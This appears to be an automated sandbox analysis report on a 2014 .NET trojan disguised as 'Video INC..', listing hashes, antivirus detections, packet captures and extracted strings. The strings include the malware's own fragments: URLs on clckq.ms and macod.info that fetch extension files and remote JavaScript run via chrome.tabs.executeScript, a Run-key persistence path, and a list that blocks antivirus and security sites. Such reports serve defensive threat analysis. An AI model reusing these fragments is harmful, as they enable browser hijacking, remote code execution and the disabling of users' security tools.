Analysis Date2018-05-02 04:41:00
MD549eb890a8017c93d47132b06b2ea0c2c
SHA13973360d5aeb9dcb5b654a6b2ed15e8e18b2c50c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
Section.text md5: b959eacca7e44773de48171831f819f6 sha1: bcbc11410ebc7cbe2375aa072f8dbc1c08afa654 size: 10240
Section.rsrc md5: a585ac5771da81c7ba0aa8ae76ff476d sha1: 741d85bfab480e153e9a9e8ee187c1b69185609e size: 96256
Section.reloc md5: cc334fb95d5231e0539bf847a049351f sha1: fd0582021fb2f5366db47b8acc5264e40ba86611 size: 512
Timestamp2014-07-05 18:57:26
Pdb pathC:\Documents and Settings\User\Belgelerim\Visual Studio 2010\Projects\WindowsFormsApplication1\WindowsFormsApplication1\obj\x86\Debug\WindowsFormsApplication1.pdb
VersionLegalCopyright: Video INC.. 2014
Assembly Version: 1.0.0.0
InternalName: WindowsFormsApplication1.exe
FileVersion: 1.0.0.0
CompanyName: Video INC..
Comments: Video INC..
ProductName: Video INC..
ProductVersion: 1.0.0.0
FileDescription: Video INC..
OriginalFilename: WindowsFormsApplication1.exe
PackerMicrosoft Visual C# v7.0 / Basic .NET
PEhashf41d18370763b914d164b3a427a937efec9d549c
IMPhashf34d5f2d4577ed6d9ceec516c1f5a744
AV360 SafeTrojan.GenericKD.1743389
AVAd-AwareTrojan.GenericKD.1743389
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Backdoor.AMNT-0361
AVAvira (antivir)TR/Kilim.D.29
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Kilim.r3
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftTrojan.GenericKD.1743389
AVEset (nod32)MSIL/ExtenBro.B
AVFortinetno_virus
AVFrisk (f-prot)W32/Backdoor2.HUUI (exact)
AVF-SecureTrojan.GenericKD.1743389
AVGrisoft (avg)PSW.ILUSpy
AVIkarusTrojan-PSW.ILUSpy
AVK7Trojan ( 0049d1551 )
AVKasperskyTrojan-Downloader.MSIL.ExtInst.c
AVMalwareBytesno_virus
AVMcafeeno_virus
AVMicrosoft Security EssentialsTrojan:MSIL/Kilim.D
AVMicroWorld (escan)Trojan.GenericKD.1743389
AVNormanwinpe/Troj_Generic.UYPKC
AVRisingno_virus
AVSophosno_virus
AVSymantecTrojan.Gen.2
AVTrend MicroTROJ_SPNR.09GN14
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Network Details:


Raw Pcap
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e31 36313a35 3335370d 0a0d0a3c   00.161:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
0x00000270 (00624)   3a366231 65626362 312d6362 38382d34   :6b1ebcb1-cb88-4
0x00000280 (00640)   3266622d 38653433 2d623538 66306131   2fb-8e43-b58f0a1
0x00000290 (00656)   66336631 393c2f77 73613a4d 65737361   f3f19</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a3061 32306630   >urn:uuid:0a20f0
0x00000340 (00832)   33362d37 3464332d 34393361 2d383337   36-74d3-493a-837
0x00000350 (00848)   322d6433 34383833 66303963 61323c2f   2-d34883f09ca2</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>


Strings
...
000004b0
1.0.0.0
Assembly Version
bg.js
chrome
Comments
CompanyName
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\WINDOWSUPDATE
C:\WINDOWSUPDATE\winupdater.exe
Extensions
FileDescription
FileVersion
Form1
\Google\Chrome\
http://clckq.ms/macod/bg.js
http://clckq.ms/macod/manifest.json
http://clckq.ms/macod/Preferences.txt
\iacffndadciecdcopofkkegcpcmnjpph\
InternalName
LegalCopyright
manifest
manifest.json
OriginalFilename
Preferences
ProductName
ProductVersion
runas
Software\Microsoft\Windows\CurrentVersion\Run
StringFileInfo
Translation
VarFileInfo
Video INC..
Video INC.. 2014
VS_VERSION_INFO
WindowsFormsApplication1.exe
WindowsFormsApplication1.Properties.Resources
winupdater.exe
<;:?<;:
=<;?=<;
><<?><<
                                };
                        }
                ) {
                }
        },
        }, {
        });
-,,?-,,
,++?,++
?==??==
/.-?/.-
.-,?.-,
@>>?@>>
@?>?@?>
*)(?*)(?*)(?*))
+*)?+*)
+**?+**
			?			
0//?0//
0/.?0/.
1.0.0.0
10.0.0.0
100o210?210?210?210?210?210?210?210?100
210?210?210?10/
210?210?210?210?210?210?210?210?100o100
3System.Resources.Tools.StronglyTypedResourceBuilder
4.0.0.0
$592f93d3-2413-41c8-b6a8-b597ca802f75
;:9?;:9
;99?;99
A@??A@?
add_Load
add_Tick
Application
ApplicationSettingsBase
</assembly>
Assembly
AssemblyCompanyAttribute
AssemblyConfigurationAttribute
AssemblyCopyrightAttribute
AssemblyCultureAttribute
AssemblyDescriptionAttribute
AssemblyFileVersionAttribute
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
AssemblyProductAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
AssemblyVersionAttribute
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
AutoScaleMode
["blocking"]);
                                        cancel: true
.cctor
C:\Documents and Settings\User\Belgelerim\Visual Studio 2010\Projects\WindowsFormsApplication1\WindowsFormsApplication1\obj\x86\Debug\WindowsFormsApplication1.pdb
                        'chrome://chrome/extensions' ||
        chrome.tabs.executeScript(key.id, {
chrome.tabs.get(keyId, function (key) {
chrome.tabs.onUpdated.addListener(
chrome.tabs.onUpdated.addListener(function (keyId) {
                        chrome.tabs.remove(key.id);
chrome.webRequest.onBeforeRequest.addListener(
            code: xhr.responseText
CompilationRelaxationsAttribute
CompilerGeneratedAttribute
components
ComVisibleAttribute
Concat
Container
ContainerControl
Control
_CorExeMain
CreateDirectory
CreateSubKey
Culture
CultureInfo
CurrentUser
DebuggableAttribute
DebuggerNonUserCodeAttribute
DebuggingModes
Default
defaultInstance
Directory
DirectoryInfo
Dispose
disposing
DownloadFileAsync
EditorBrowsableAttribute
EditorBrowsableState
EnableVisualStyles
Environment
EventArgs
EventHandler
Exception
Exists
Form1_Load
                for (var i = 0; i < ibneler.length; i++) {
        function (details) {
        function (keyid, x, key) {
GeneratedCodeAttribute
get_Assembly
get_bg
get_Culture
GetCurrent
get_Default
GetDirectories
get_ExecutablePath
GetFolderPath
get_manifest
get_Preferences
GetProcessesByName
get_ResourceManager
get_StartInfo
GetString
GetTypeFromHandle
GuidAttribute
IContainer
IDisposable
                if (key.url ==
    if (key.url.indexOf('devtools://') < 0) {
                        if (url.indexOf(ibneler[i]) > -1) {
if (xhr.readyState == 4) {
InitializeComponent
IsInRole
                        key.url == 'chrome://extensions/'
                        key.url == 'opera://extensions' ||
KIH?KIH?KIH?KIH?KIH
KIH?KIH?KIH?KIH?KII
KJI?KJI
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
LJJ?LJJ
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
manifest
Microsoft.Win32
MKJ?MKJ
<Module>
mscoree.dll
mscorlib
NLK?NLK
*)(?*)(?*)(?*)(?*)(?*)(?*)(?*)(?*)(o*)(
*)(o*)(?*)(?*)(?*)(?*)(?*)(?*)(?*)(?*)(
Object
OML?OML
PADPADP
PNM?PNM
PON?PON
Preferences
Process
ProcessStartInfo
Program
QON?QON
ReferenceEquals
Registry
RegistryKey
@.reloc
Replace
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
resourceCulture
resourceMan
ResourceManager
Resources
ResumeLayout
                                return {
RPO?RPO
RSDS52	
`.rsrc
RuntimeCompatibilityAttribute
RuntimeTypeHandle
SearchOption
    </security>
    <security>
sender
set_AutoScaleDimensions
set_AutoScaleMode
set_ClientSize
SetCompatibleTextRenderingDefault
set_Culture
set_FileName
set_Interval
set_Name
set_Text
Settings
SettingsBase
SetValue
set_Verb
SpecialFolder
STAThreadAttribute
String
#Strings
SuspendLayout
Synchronized
System
System.CodeDom.Compiler
System.ComponentModel
System.Configuration
System.Diagnostics
System.Drawing
System.Globalization
System.IO
System.Net
System.Reflection
System.Resources
System.Runtime.CompilerServices
System.Runtime.InteropServices
System.Security.Principal
System.Threading
System.Windows.Forms
!This program cannot be run in DOS mode.
Thread
timer1
timer1_Tick
ToString
  </trustInfo>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
                urls: ["<all_urls>"]
v2.0.50727
var ibneler = ['nod32.com','nod32.com.tr','facebook.com/csp.php','kingusd.com','vatansana.com','wjetphp.com','jscmd.net','video-izleyin.tk','virustotal.com','avast.com','eset.com','microsoft.com','virusscan.jotti.org','jotti.org','avg.com','kaspersky.com.tr','kaspersky.com','facebook.com/ajax/webstorage/process_keys.php','facebook.com/checkpoint/malware/cr_ext_config','facebook.com/checkpoint/malware/cr_ext_log','sansurcrx.com','dl.dropboxusercontent.com/s','sosyalmedyakusu.com','fiddle.jshell.net','fei-coder.com','docs.google.com','drive.google.com','orjinalmarket.net','facebook.com/ajax/follow/unfollow_profile.php','vuupc.com','mcafee.com','googlecode.com','akamai.net','facebook.com/xti.php','.exe','rackcdn.com'];
                var url = details.url;
var xhr = new XMLHttpRequest();
Video INC..
Video INC.. 2014
WebClient
WindowsBuiltInRole
WindowsFormsApplication1
WindowsFormsApplication1.exe
WindowsFormsApplication1.Form1.resources
WindowsFormsApplication1.Properties
WindowsFormsApplication1.Properties.Resources.resources
WindowsIdentity
WindowsPrincipal
WrapNonExceptionThrows
xhr.onreadystatechange = function () {
xhr.open("GET",'http://macod.info/macod/main.php?' + Math.random() * 999999, true);
xhr.send();
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX